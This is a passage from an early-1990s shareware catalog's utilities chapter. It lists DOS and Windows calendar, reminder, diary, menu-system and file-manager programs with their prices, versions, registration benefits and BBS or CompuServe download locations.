Special instructions: Product distribution restricted to the + United States. + Description: + Maintain an electronic phone book, organize recipes, audio and + video tape libraries, home appliance inventory and much more. + Program includes a nice appointment schedular. There is even a + place to store information on credit cards should they become + lost or stolen. This one is becoming very popular. + + Product: HouseHold TRACKER + Inventory items around the house. See full description on + page 150. + + Product: InContext + DOS shell+, based on principles of human work. See full + description on page 114. + + Product: NAMEBASE + Name/Address/Notes database w/mouse support. See full + description on page 222. + + Product: Names & Dates + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: WR Software, 415-930-0369 + Registration: $25.00 + Registration benefits: Printed documentation, free upgrade, + telephone (or mail) support, future upgrade notification, vinyl + address book cover. + Version: 4.2 (04-26-91) + User benefits: Printed documentation, free upgrade, telephone (or + mail) support, future upgrade notification, vinyl address book + cover. + Look for: ND42*.ZIP (multiple files) on BBSs (call 415-937-0156 + to download it at no charge). + Download size: 400k + Description: + Prints pocket-size (and larger) address books, prints wall-type + calendars with user dates (2 sizes), date reminder alarms + (birthdays, etc.), phone autodialing (long distance prefix, + local area code, letter translation, call duration), mailing + labels (10 formats, incl. laser, 1-4 across), Rolodex cards (2 + + Chapter 2, "Utilities" 94 + + + + sizes), sort by name or Zip, 9 diff. reports, print envelope + addresses (laser too, optional return), 5-line 33 character + address area, unlimited names, large NOTES area, context + sensitive help. + + Product: ORGANIZE + Personal Appointment Calendar. See full description on + page 85. + + Product: Personal Calendar (PC) for DOS + Needs: IBM PC, DOS 2.1 or better. DOS 3.0 or better if used as a + TSR. + Author: FunStuff Software, 703-435-1110 + Registration: $35.00 + Registration benefits: Printed manual, master disks, phone/BBS/ + mail support, various product discounts. + Version: 14.41 (03-10-92) + User benefits: Printed manual, master disks, phone/BBS/mail + support, various product discounts. + Look for: PC1441.ZIP on BBSs (call 703-323-6423 to download it at + no charge); PC1441.ZIP in IBMSYS forum LIB 7 on CompuServe. + Download size: 191k + Description: + Friendly Personal Information Manager (PIM) displays a 3-month + scrollable calendar, a running analog/digital clock, a time- + oriented event list of your appointments, and your notes. + Printable for pocket/purse. Keeps a historical diary. Warnings + and alarms tell when events are pending or overdue. Flexible + menu interface as a TSR or normal program. TSR can interrupt + you at the earliest event. Extremely stable, environment + sensitive TSR is a 6K byte kernel, with the balance swapped to + EMS or disk. + + Product: PopDBF + 4K TSR for "Instant Access to X-Base Files" See full + description on page 166. + + Chapter 2, "Utilities" 95 + + + + Product: Resident Task Manager + Needs: IBM PC, DOS 2.1 or better. 150k RAM. + Author: WetZoft Applications, 301-969-9385 + Registration: $30.00 + Registration benefits: Printed Manual & Latest Disk; + Phone,CompuServ,GEnie Support; Priority Enhancement + Consideration. + Version: 2.11 (01-05-91) + User benefits: Printed Manual & Latest Disk; + Phone,CompuServ,GEnie Support; Priority Enhancement + Consideration. + Look for: RTM211.EXE on BBSs (call 414-789-4210 to download it at + no charge); RTM211.EXE in IBMSYS forum LIB 7 on CompuServe; + RTM211.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 140k + Description: + Manages lists of Tasks, Reminders, Ticklers, or ToDo's. Loads + as 6K TSR or Normal Task. Available anytime! Features: Task's, + Priorities, 5 line Descriptions, User Field, Pull-Down Menus, + Audit Files. 3 Level Sort, Task Transfer, Print to Disk, Audit + Browse. Optionally Integrates with Sidekick + and 2.0 (via + CALRPT/SK2) for Task-Calendar Mgmt; Find Task, DOS Shell, File + Linking, Single Swap File, More + + Product: See Mail + E-mail facility, combines MCI with LAN e-mail. See full + description on page 180. + + Product: Sell More Software + Sales and Marketing for Software Developers. See full + description on page 232. + + Product: STAFF-BASE + Flat File DBMS with relations to other DBF's. See full + description on page 151. + + Product: STAFF-DIAL + Dialing with phone numbers stored in DBF file. See full + description on page 90. + + Product: STAFF-KICK + TSR DBMS compatible with dBASE III Plus. See full description + on page 152. + + Product: Task Master [***] + Project tracking and management program. See full description + on page 220. + + Chapter 2, "Utilities" 96 + + + + Product: Tikler + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Author: Olsen Outdoors, 508-486-3042 + Registration: $15.00 + Registration benefits: Newest version sent. Unlimited phone, CIS, + mail and BBS support. + Version: 3.95 (03-22-91) + User benefits: Newest version sent. Unlimited phone, CIS, mail + and BBS support. + Look for: TIK395.ZIP on BBSs (call 508-875-3618 to download it at + no charge); TIK395.ZIP in IBMSYS forum LIB 7 on CompuServe. + Download size: 38k + Description: + A quick and easy appointment/event reminder program. Nothing + fancy, just the essentials. Handles up to 600 events and + supports passwords and encription of your event files. Can be + run from your AUTOEXEC.BAT file so it will pop onto your screen + when you turn on your computer. TIKLER has been called the + easiest to use program of its type by many of its loyal users. + Once you've used this program, you'll find it indispensable. + + 2.6.9 Time management + + Product: APCAL [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Gamma Software, 303-667-9960 + Registration: $35.00 + Registration benefits: Printed manual, master disks, phone/ + CompuServe/mail support. + Version: 3.10 (01-10-92) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: APCAL310.ZIP on BBSs; APCAL3.ZIP in IBMNET forum LIB 7 + on CompuServe; APCAL.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 141k + Description: + This appointment calendar is extremely easy to use because the + screens are set up in formats you are already fimiliar with. + For example it contains monthly calendars with day blocks in + which you can type notes like a wall calendar. Appt screens are + set up like most appointment books, simply type appt next to + time. Configure appt times to match your schedule. Appt + features include: move,copy,del,search and more. Quickly scan + for an open time slot. Popup reminders, year display, + printouts, and more. + + Product: Early Bird + Great Full-Featured Reminder/Calendar Program. See full + description on page 84. + + Product: InContext + DOS shell+, based on principles of human work. See full + description on page 114. + + Chapter 2, "Utilities" 97 + + + + Product: Personal Calendar (PC) for DOS + TSR PIM Appointment Reminder, Clock, Calendar. See full + description on page 94. + + Product: Personal Time Card + Needs: IBM AT (80286), Windows 3.0 or better. Strongly + recommended: IBM 80386 computer running Windows in Enhanced + mode. + Author: Fischer Grafix & Software + Registration: $20.00 + Registration benefits: Master disks, phone/fax support. + Version: 1.0 (02-03-92) + User benefits: Master disks, phone/fax support. + Look for: PTC.ZIP on BBSs; PTC.ZIP in IBMAPP forum LIB 6 on + CompuServe. + Download size: 260k + Description: + Keep your project time organized either daily or weekly. PTC + will keep your time cards in order of date and allow entries + for job number (project), description and time (regular and + overtime). PTC will print the cards for hard copies and back-up + your files to diskette. Multiple users need only create a + directory for each user to store files. + + Product: Resident Task Manager + Task/ToDo List Manager; Reminders & Ticklers. See full + description on page 94. + + Product: Task Master [***] + Project tracking and management program. See full description + on page 220. + + Product: Tikler + Quick, easy, appointment/event reminder. See full description + on page 95. + + Product: TimeTrac + Time & Expense tracking; TSR, Export, LANs. See full + description on page 217. + + Chapter 2, "Utilities" 98 + + + + Product: TrikTrak [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Rhode Island Soft Systems, Inc., 401-658-4632 + Registration: $69.00 + Registration benefits: Newsletter, BBS, update notices, and more! + Version: 2.0a (03-01-92) + User benefits: Newsletter, BBS, update notices, and more! + Look for: TTRAK20A.ZIP on BBSs (call 401-658-3465 to download it + at no charge); TTRAK2.ZIP in IBMAPP forum LIB 7 on CompuServe; + TTRAK20A.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 250k + Description: + Replaces white dry erase boards and other large scheduling + sheets. Allows users to create their own custom applications, + much in the same fashion as a spreadsheet program allows users + to create their own spreadsheets. With the AutoTrak feature, + users can have the computer pop up the next event for any + resource as the day progresses. Comes with several sample + applications including one for restaurant table reservations, a + message taker for a departmental secretary, and more! + + 2.6.10 Journal/diary programs + + Product: Ample Notice + Very flexible appointment scheduler/alarm. See full + description on page 83. + + Product: FISHBYTE(tm) + Fishing and Loran Log for Saltwater Anglers. See full + description on page 371. + + Product: OMNIDay + Needs: IBM PC, DOS 2.1 or better. IBM Graphics Or LaserJet + printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Registration benefits: Master disks, phone/BBS/mail support. + Shareware disks of other programs. + Version: 2.29b (12-18-91) + User benefits: Master disks, phone/BBS/mail support. Shareware + disks of other programs. + Look for: ODAY229B.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ODAY.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 170k + Description: + A benchmark system for electronic diary programs! Allows up to + 10 users, each with their own passcode. Optional encryption of + the opus (up to 10,000 possibilities). The user names the opus + and enters their own name as author. Automatic entry of text + date line, entry can be up to 5000 lines long. User can update + and delete entries. Will print out opus for selected dates or + all. Full featured text editor with on line help. Import + feature for those who travel. DOC file includes diary keeping + tips. + + Chapter 2, "Utilities" 99 + + + + Product: Resident Task Manager + Task/ToDo List Manager; Reminders & Ticklers. See full + description on page 94. + + Product: Systems Manager + Reports time by client, purpose & application. See full + description on page 223. + + Product: Task Master [***] + Project tracking and management program. See full description + on page 220. + + + 2.7 Menu systems & file managers + + 2.7.1 Menu systems + + Product: ActMenu + Needs: IBM PC, DOS 3.0 or better. + Author: ShareGames, 619-283-0472 + Registration: $25.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 5.9 (05-04-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: ACTMENU.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 152k + Description: + Puts the full power of DOS into single key or click menus. + Starter menus are provided and Help is available throughout. + Each, of up 43 menus, allow up to 51 keys and any menu can + access any other menu. Each key executes up to three BAT + statements. Menus can be customized with the internal or any + ASCII editor. Works with ActCalendar to display daily + reminders. There's also a phone directory (w/auto first letter + search), a modem dialer, and built in screen blanker. + + Product: BATUTIL + Batch Enhancement Language. See full description on page 68. + + Chapter 2, "Utilities" 100 + + + + Product: BCS Menu Program + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Author: Bristol Computing Systems, Inc. + Registration: $34.95 + Registration benefits: Diskette and printed manual. + Version: 2.0 (12-10-90) + User benefits: Diskette and printed manual. + Look for: availability unknown on BBSs; BCSMNU.ZIP in IBMSYS + forum LIB 5 on CompuServe; BCSMNU20.ZIP in IBMPC RTC LIB 5 on + GEnie. + Download size: 195k + Description: + Complete menu program with mouse support, palette control on + EGA/VGA. Supports MDA, CGA, EGA, VGA and 8514a displays. Pop-up + Windows. Command Helper (disk browser) automates building menu + entries. Screen blanker with user entered message. Flexible + menu screen formatting. Up to 100 entries per menu. Unlimited + menus. All commands are executed directly from memory - does + not use batch files. Uses only 2.5k RAM during command + execution. Not a TSR. Many other features. + + Product: Bmenu + Needs: IBM PC, DOS 3.1 or better. + Author: Mark Strong + Registration: $15.00 + Registration benefits: One time registration valid for all future + versions, notification of major updates, Support via CompuServe + Mail or U.S. Mail. + Version: 5.41 (09-17-90) + User benefits: One time registration valid for all future + versions, notification of major updates, Support via CompuServe + Mail or U.S. Mail. + Look for: BMENU54.ZIP on BBSs (call 513-779-3489 to download it + at no charge); BMEN54.ZIP in SYSUTIL forum LIB 1 on CompuServe. + Download size: 29k + Description: + Provides pop-up menus within a batch file of any size or + position on the screen, as specified on the command line. + Color, title and choices can be listed on a single line to + produce a complete menu on the screen. Several menus can also + be read from an @file with an indexed marker. Returns + errorlevel (like ASK) for use in batch file branching. Very + flexible for networks as a user interface or on install disks + for user input. + + Product: BOOT.SYS + Use boot-up menus to select system config. See full + description on page 74. + + Product: DaMenu + DaMenu - Dos Application MENuing Utility. See full description + on page 12. + + Chapter 2, "Utilities" 101 + + + + Product: DAYO MENU + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $25.00 + Registration benefits: Multiuser, Manual (printed & disk), Phone + Support. + Version: 3.0 (06-28-91) + User benefits: Multiuser, Manual (printed & disk), Phone Support. + Look for: DAYOME.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOME.ZIP in IBMAPP forum LIB 6 on CompuServe; + DAYOME.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 250k + Description: + A simple DOS level menu system for use with the DAYO line of + Business Applications. Many features are available as menu + options, ie: 18 screen fonts, 25, 43, or 50 lines per page, + system statistics, view user manuals, and more. + + Product: Directory Freedom + Compact file manager and application launcher. See full + description on page 7. + + Product: Easy Access + Needs: IBM PC, DOS 2.1 or better. Hard disk. + Author: TengWare Enterprises, 714-587-1025 + Registration: $25.00 + Registration benefits: Latest version of program, TengWare logo + will no longer display upon startup, you will be informed of + future enhancements. + Version: 6.2a (05-20-91) + User benefits: Latest version of program, TengWare logo will no + longer display upon startup, you will be informed of future + enhancements. + Look for: EZ62.ZIP on BBSs; EASY.ZIP in IBMSYS forum LIB 5 on + CompuServe; EASY62.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 188k + Description: + This professional menu system is perfect for either home or + office. It is simple to maintain yet has the features required + by the most demanding user. Features: + * Simple set up & maintenance + * User defined colors & headings + * Calendar & Reminder subsystem + * User log on & usage logging (optional) + * 2 levels of password protection + * Point & Shoot & mouse support + * 26 options per menu with unlimited submenus + * On line help + + Product: EXTENDED BATCH LANGUAGE-PLUS! + The real Batch Language you wish DOS had. See full description + on page 69. + + Chapter 2, "Utilities" 102 + + + + Product: fastmenu GOLD + Graphics User Interface (GUI), Menu System. See full + description on page 112. + + Product: Folders + Needs: IBM PC, Windows 3.0 or better. EGA or Hercules monitor. + Author: Sloop Software, 719-260-0433 + Registration: $35.00 + Registration benefits: Printed manual, master disks. Unlimited + mail support. + Version: 3.4a (07-29-91) + User benefits: Printed manual, master disks. Unlimited mail + support. + Look for: availability unknown on BBSs; FOLDER.ZIP in WINADV + forum LIB 10 on CompuServe. + Download size: 85k + Description: + Gives the ability equivalent to being able to create subgroups + in Program Manager groups. Features include no limit on + nesting folders within folders. Move or copy items using a + drag/drop interface. Multi-select capability when adding, + deleting, moving or copying items. Display items as icons or + only names. Simple, easy to use icon selector using an icon + browser dialog box. Password protection. Run command with + browse button which stores last twelve commands entered. + + Product: Getkey/2 + Reports user keystroke as an ERRORLEVEL. See full description + on page 69. + + Product: HDM IV - Hard Disk Menu + Needs: IBM PC, DOS 2.0 or better. 300k RAM to hold program and + tables, but uses 0K (no bytes) when running a program, command, + or batch file. + Author: MicroFox Company, 216-659-9489 + Registration: $35.00 + Registration benefits: Unlimited free support via mail, phone, + CompuServe. $50 gets latest disks & published user manual. + Can be beta tester for new unreleased version. + Version: IV 3.10 (06-28-91) + User benefits: Unlimited free support via mail, phone, + CompuServe. $50 gets latest disks & published user manual. + Can be beta tester for new unreleased version. + Look for: HDM431.ZIP on BBSs (call 216-661-9065 to download it at + no charge); HDM431.ZIP in IBMSYS forum LIB 5 on CompuServe; + HDM431.ZIP in IBM RTC LIB 0 on GEnie. + Download size: 222k + Description: + A DOS shell that hides the underlying operating system from the + uninitiated user, yet does not get in the way of the expert + user. Features: network & mouse support, multi-level security + system, usage logging, phone dialer, variable screen blanker, + timed execution, multi- user log on/off with passwords, + extensive on-line help, file and directory pick lists, user + + Chapter 2, "Utilities" 103 + + + + defined logo screen, DOS window, pass keystrokes to user + programs, 260,000 menu entries, non-TSR. + + Product: Instant Access Menu System [***] + Needs: IBM PC, DOS 2.0 or better. Hard disk recommended. + Author: Prodigy Technologies, 619-673-0722 + Registration: $35.00 + Registration benefits: Master disks, phone/mail support. + Version: 2.8 (07-05-90) + User benefits: Master disks, phone/mail support. + Look for: IAMS28.ZIP on BBSs (call 619-223-7299 to download it at + no charge). + Download size: 250k + Description: + Designed to ease the pain of complicated and intricate DOS + commands. Customizable colors provide an attractive and easy + to use doorway to DOS applications. Its many features allow + you to quickly customize it to your individual needs - yet it + won't overburden you with its own setup. Features include + mouse support, password protection, timed execution, data + backup system, keyboard lock, screen saver, usage log and built + in note pad and text editor. + + Product: Launcher + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $15.00 + Registration benefits: Eligibility for free upgrades. + Version: 1.21 (06-09-91) + User benefits: Eligibility for free upgrades. + Look for: LAUND121.ZIP on BBSs; LAUND1.ZIP in IBMSYS forum LIB 1 + on CompuServe. + Download size: 23k + Description: + Passes user entered strings as arguments to a program, which is + loaded & run. Use this utility to get user input (e.g., file + name, password, etc.) before starting a program. Especially + useful when running programs from a batch file or menu system, + when the program arguments vary. Options to hide input, + restrict input length, compare input to an edit mask, verify + input, etc. + + Chapter 2, "Utilities" 104 + + + + Product: LOGIK MENU + Needs: IBM PC, DOS 3.0 or better. 384k RAM, hard disk. + Author: LOGIVISION INC., 819-823-6761 + Registration: $55.00 + Registration benefits: Printed manual, master disks, phone/fax/ + newsletter/mail support, bonus utilities, Free updates (you pay + P&H). + Version: 1.61 (07-10-91) + User benefits: Printed manual, master disks, phone/fax/ + newsletter/mail support, bonus utilities, Free updates (you pay + P&H). + Look for: LM161.ZIP on BBSs; LM161.ZIP in IBMSYS forum LIB 5 on + CompuServe; LM161.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 294k + Description: + Designed for ease of use at the touch of a key. Extensive on- + line help, EGA/VGA 43/50 line mode supported, true mouse + support (Point & Shoot), has passwords, screen saver, hidden + "hot" keys, usage log report, event tracking (reminds you + important dates), uses 0 memory, customizable help... Automatic + installation (from beginners to experienced user) scans your + hard drive for popular programs. + + 50 items per menu 50 sub-menus (multiple levels) 80 commands + per option 30 General Hidden Hot Keys + + Product: MenuEase + Needs: IBM PC, DOS 2.0 or better. Hard Disk, 256k RAM. + Author: Creative Computer, 714-687-2421 + Registration: $45.00 + Registration benefits: Latest version disk, printed manual, 60 + days phone support, and additional utilities. + Version: 1.6.3 (08-10-91) + User benefits: Latest version disk, printed manual, 60 days phone + support, and additional utilities. + Look for: MENUEASE.ZIP on BBSs (call 213-609-2176 to download it + at no charge). + Download size: 360k + Description: + Provides unlimited menus with up to 26 menu items/menu and up + to seven commands per menu item. MenuEase allows separate menus + or common menus for an unlimited number of users. A complete + password system protects DOS access, menu maintenance, system + configuration, menu items, and submenus. Each menu item can + force MenuEase to be remain in memory or remove itself + completely from memory when executed. Custom colors and all + video adapters are supported. Usage logging for businesses is + provided. + + Chapter 2, "Utilities" 105 + + + + Product: Painless Menu Manager + Needs: IBM PC, DOS 2.1 or better. 640k RAM, hard disk. + Author: Painless Accounting, 800-521-9905 + Registration: $20.00 + Registration benefits: Latest copy of the software along with a + printed manual. Also receive major discounts on updates. + Version: 5.0 (08-31-91) + User benefits: Latest copy of the software along with a printed + manual. Also receive major discounts on updates. + Look for: PAM.ARC on BBSs (call 214-881-0313 to download it at no + charge); PAM.ARC in IBMSYS forum LIB 3 on CompuServe; PAM.ARC + in IBM RTC LIB 3 on GEnie. + Download size: 150k + Description: + Great Hard Disk Menuing System. Some features include: mouse + support, movable/resizable windows, phone directory and dialer, + appointment scheduler, unlimited menu options, VGA/EGA support, + copy/delete/rename/move/view/backup/restore files, tree + directories, word processor, calendar, notepad, calculator, + color parameters, password protection, screen saver and much + more. + + Product: PC SYSTEM MANAGER + Needs: IBM PC, DOS 2.1 or better. 256k RAM, hard disk. + Author: MORSOFT, 512-561-0731 + Registration: $19.95 + Registration benefits: Printed manual, phone support. + Version: 2.0 (07-01-90) + User benefits: Printed manual, phone support. + Look for: availability unknown on BBSs; PCSMINS*.ZIP in IBMPC RTC + LIB 5 (multiple files) on GEnie. + Download size: 520k + Description: + This master menuing/submenuing system has all the bells and + whistles. Up to 32,000 menus and program selections, customized + run time help, customized command line replaceable parameter + prompts, individual userid logon, time usage tracking with 4 + detail and summary reports, password protection and automatic + job starting based on time & date or day of week. + + Chapter 2, "Utilities" 106 + + + + Product: PullDown SAA Menu Shell + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Author: MicroDynamics Development, 215-367-1891 + Registration: $34.95 + Registration benefits: Shrinkwrapped User's Guide with 51/4' & 31/2' + Diskettes. + Version: 3.20 (07-08-91) + User benefits: Shrinkwrapped User's Guide with 51/4' & 31/2' + Diskettes. + Look for: CUA1OF3.ZIP (multiple files) on BBSs (call 215-623-6203 + to download it at no charge); CUA-1.ZIP in IBMSYS forum LIB 6 + (multiple files) on CompuServe. + Download size: 890k + Description: + A fully SAA compliant (Like PCTools) menu shell system for both + standalone PCs and DOS LANs. Differentiating features range + from user-defined help and full screen blanker/color + configurations to an integrated menu definition editor with + context-sensitive help and user-defined dialogs. PullDown + offers unmatched ease of use for users and maximum power to the + professional. Non-TSR design assures conflict-free reliable + operation on all DOS and LAN platforms. + + Product: Sloop Manager + Needs: IBM PC, Windows 3.0 or better. EGA or Hercules monitor. + Author: Sloop Software, 719-260-0433 + Registration: $35.00 + Registration benefits: Printed manual, master disks. Unlimited + mail support. + Version: 1.2b (01-27-92) + User benefits: Printed manual, master disks. Unlimited mail + support. + Look for: availability unknown on BBSs; SLPMAN.ZIP in WINADV + forum LIB 10 on CompuServe. + Download size: 225k + Description: + Has virtually all of Program Managers's features plus a host of + new one. Features include the ability to create folders + (groups) within folders; move or copy items using a drag/drop + interface; multi-select capability when adding, deleting, + moving or copying items; password protection; run command with + browse button which stores last twelve commands entered; + simple, easy to use icon browser dialog box; associate multiple + programs with a single extension; customizable popup run menu; + and more. + + Chapter 2, "Utilities" 107 + + + + Product: STAFF-INTEGRATOR + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $29.00 + Registration benefits: Printed manual, latest version on disk, + phone support. + Version: 2.0 (01-01-91) + User benefits: Printed manual, latest version on disk, phone + support. + Look for: availability unknown on BBSs; STFINT.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 264k + Special instructions: Product distribution restricted to the + United States. + Description: + A general purposed menu generator which allows the integration + of different software tools according to the priorities of the + user. The program consists of two modules: a menu generator and + a run time module for the execution of the menus. An unlimited + number of menus can be created. Each menu can have up to 32 + entries. Chains of menus can be defined. Virus control + function. Parameters (like path, file name, drive specifier, + etc.) can be passed over. Mouse support. Log file.... + + Product: Systems Manager + Reports time by client, purpose & application. See full + description on page 223. + + Product: ToyBox II [***] + Needs: IBM PC, DOS 3.0 or better. EGA monitor, 512k RAM, hard + disk. + Author: Virtual Magic Software + Registration: $29.00 + Registration benefits: Master disks, Compuserve/Prodigy/mail + support, bonus utiliites. + Version: 2.00 (03-29-92) + User benefits: Master disks, Compuserve/Prodigy/mail support, + bonus utiliites. + Look for: availability unknown on BBSs; TOY200.ZIP in IBMSYS + forum LIB 5 on CompuServe. + Download size: 128k + Description: + Beautiful, powerful graphical menu for users of all ages. Has + all the features found in menu programs designed for adults, + yet can also be safely and easily used by young children. Uses + large 3-D buttons with colorful, Microsoft Windows-compatible + icons to represent your programs. Runs a program with a single + keystroke or mouse click. Features multiple menu levels, + passwords, hotkeys, file picklists, and a built-in icon editor. + Requires no memory for itself while it runs your programs. + + Product: Wyndshell [***] + Hard Disk Menu. See full description on page 113. + + Chapter 2, "Utilities" 108 + + + + 2.7.2 File managers + + Product: 4EDIT + Needs: IBM PC, DOS 2.1 or better. + Author: XD Systems, 703-821-3215 + Registration: $15.00 + Registration benefits: Disk and printed manual; telephone and CIS + support; public domain bonus programs. + Version: 1.09 (10-13-91) + User benefits: Disk and printed manual; telephone and CIS + support; public domain bonus programs. + Look for: availability unknown on BBSs; 4EDIT.ZIP in IBMSYS forum + LIB 1 on CompuServe. + Download size: 73k + Description: + Adds descriptions (up to 80 characters) to MSDOS filenames and + subdirs. File descriptions allow you to identify your files in + much more meaningful ways than MS-DOS allows in an eight + character filename. 4EDIT has a convenient full-screen editor + with a cut and paste feature -- especially useful when several + files need similar descriptions. Select a grouping of files + using multiple filespecs with extended wildcards. + + For all versions of 4DOS. Supports new Ver 4.0 extended + descriptions. + + Product: 4FILES + Needs: IBM PC, DOS 2.0 or better. 64k RAM. Strongly + recommended: 4DOS or NDOS. + Author: Hand-Crafted Software, 907-747-8996 + Registration: $20.00 + Registration benefits: Master disks, support, free upgrade. + Version: 2S.4 (03-31-92) + User benefits: Master disks, support, free upgrade. + Look for: 4FILES2S.ZIP on BBSs (call 415-994-2944 to download it + at no charge); 4FILES.ZIP in PCVENB forum LIB 10 on CompuServe; + 4FILES2S.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 68k + Description: + A multipurpose 4DOS/NDOS-aware file manager, file annotator, + and slick front-end for your favorite utilities. The interface + is clean & convenient in every respect. + * Manage directories & files (singly or in blocks) from a + list sorted in any of several ways. + * Nice file note editor. (4DOS/NDOS keep the notes with + their files during file copy, move, etc.) + * Rapid-fire access to files w/ your browser & other + utilties. + * On-the-fly reconfiguration. + * Good documentation. + + Product: 4ZIP/4UNZIP + Includes 4DOS file descriptions in ZIP files. See full + description on page 121. + + Chapter 2, "Utilities" 109 + + + + Product: ActaeOn + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Hard Disk. + Author: Jon Clempner + Registration: $34.95 + Registration benefits: Printed manual, Notification of updates. + Version: V1.60 (11-12-91) + User benefits: Printed manual, Notification of updates. + Look for: ACTV160.ZIP on BBSs; ACT160.ZIP in IBMSYS forum LIB 3 + on CompuServe. + Download size: 110k + Description: + A Hard Disk Manager with a point and shoot interface to DOS. + Although its ease of use will make it ideally suited to the new + user, the regular user will find it useful on a day to day + basis. In addition to most DOS commands, it has many other + features including: + * Graphical representation of Directory Tree + * Find File/Find string within files + * Add your own commands + * Full Mouse support/Scroll bars + * Text editor + * Context Sensitive help + + Product: Attribution + Changes or displays file/directory attributes. See full + description on page 32. + + Product: CM_FILER + Needs: IBM PC, DOS 2.0 or better. 183k RAM. + Author: NoVaSoft, 703-221-1833 + Registration: $30.00 + Registration benefits: Printed manual, $10 commission per + referral, one free upgrade disk, one year support. + Version: 5.22 (03-09-92) + User benefits: Printed manual, $10 commission per referral, one + free upgrade disk, one year support. + Look for: CM_FILER.ZIP on BBSs (call 216-381-3320 to download it + at no charge); CF522.ZIP in IBMSYS forum LIB 5 on CompuServe; + CM_FILER.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 114k + Description: + A multi-function disk/file manager with side-by-side display of + directories OR trees. Full suite of file/directory/tree + structure services; built-in editor, file finder, notepad, + application launcher, background print spooler. Intuitive + command syntax, small and fast. Many special features such as + printing directory/tree listing, instant file freshening, + password access, file protection from inadvertent deletion. + Great for beginners and developers alike. Small at 91k, very + fast. + + Product: DIRECT MAINT + Hard disk directory and file manager. See full description on + page 12. + + Chapter 2, "Utilities" 110 + + + + Product: DIREDIT + Needs: IBM PC, DOS 2.1 or better. + Author: Computer Counselors, Inc., 215-527-4408 + Registration: $20.00 + Registration benefits: Latest version of program on disk. + Telephone and mail support. Notice of upgrades, bug fixes, etc. + Version: 3.05 (05-31-90) + User benefits: Latest version of program on disk. Telephone and + mail support. Notice of upgrades, bug fixes, etc. + Look for: availability unknown on BBSs; DIREDI.EXE in IBMSYS + forum LIB 1 on CompuServe. + Download size: 78k + Description: + This utility allows you to rearrange the order of files and + sub-directory entries in a DOS directory. As well as allowing + you to sort the directory in various standard ways, it allows + you to move individual files around and/or specify an arbitrary + sort order. V3.05 includes support for almost all fixed and + removable disks and for > 32 Mb devices under DOS 4.0 and 5.0 + and Compaq DOS 3.31. + + Product: EDDY (EDit DirectorY) + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 14. + + Product: fastmenu GOLD + Graphics User Interface (GUI), Menu System. See full + description on page 112. + + Product: PMZIP [***] + OS/2 Presentation Manager ZIP shell. See full description on + page 35. + + Product: QFiler + Needs: IBM PC, DOS 2.1 or better. + Author: Jamestown Software, 608-271-2090 + Registration: $20.00 + Registration benefits: Printed manual and disk; phone/BBS/ + newsletter support. + Version: 3.2 (07-15-91) + User benefits: Printed manual and disk; phone/BBS/newsletter + support. + Look for: QF*.* (multiple files) on BBSs (call 608-271-3685 to + download it at no charge); QF32*.EXE in IBMSYS forum LIB 5 on + CompuServe. + Download size: 150k + Description: + This powerful file manager displays two sorted directories + side-by-side. Copy, rename, move or delete both files and + directories. View file contents in ascii or hex. View and print + directory tree. Find files on any drive. Create and remove + subdirectories. Locate duplicate files. Set or clear file + attributes. Change time/date stamps. Simplify use of file + compression utilities like LHA and PKZip. Rename disk volume + + Chapter 2, "Utilities" 111 + + + + labels. Undelete or edit files. XCopy directories. Send files + to print queue. + + Product: TreeTop + Needs: IBM PC, DOS 2.0 or better. Hard Disk, 256K RAM. + Author: Kilgore Software, 916-371-3715 + Registration: $39.00 + Registration benefits: Free technical telephone support, a bound + type set manual with a quick reference chart and the latest + version on disk. + Version: 2.44 (03-02-91) + User benefits: Free technical telephone support, a bound type set + manual with a quick reference chart and the latest version on + disk. + Look for: availability unknown on BBSs; TREETO.EXE in IBMSYS + forum LIB 5 on CompuServe. + Download size: 346k + Description: + A fast, user friendly Hard Disk File and Directory Manager with + a Point & Shoot user interface. Group files by wildcards, + attributes, date/time, directory, or disk. Features include: + * Graphic display of directory tree + * Multiple logged drives + * Sort/view/copy/move/delete/print files + * Modify date/time/attr of files + * Add, delete, or rename directories + * Online context sensitive help + * Full mouse support + * Pull down menus + * Excellent use of color + * Much, Much More! + + Product: WinZip [***] + Windows ZIP/LZH/ARC Shell:View/Run/Extract/+. See full + description on page 36. + + Product: Wynd-DOS [***] + Needs: IBM PC, DOS 3.0 or better. 256k RAM. + Author: Wyndware, 608-755-1628 + Registration: $30.00 + Registration benefits: Printed manual, tutorial, master disks, + upgrade discounts. + Version: 2.2 (08-01-91) + User benefits: Printed manual, tutorial, master disks, upgrade + discounts. + Look for: WYNDOS22.ZIP on BBSs. + Download size: 110k + Description: + This utility program allows you to manage disk files from a + friendly environment, without having to type commands at a DOS + prompt. Selected files or directories may be copied, moved, + renamed, or deleted easily. Text files (such as batch files) + may be created and edited. Programs listed in your directories + may be run without exiting the program. You may quickly search + + Chapter 2, "Utilities" 112 + + + + for specific files anywhere on your disks, 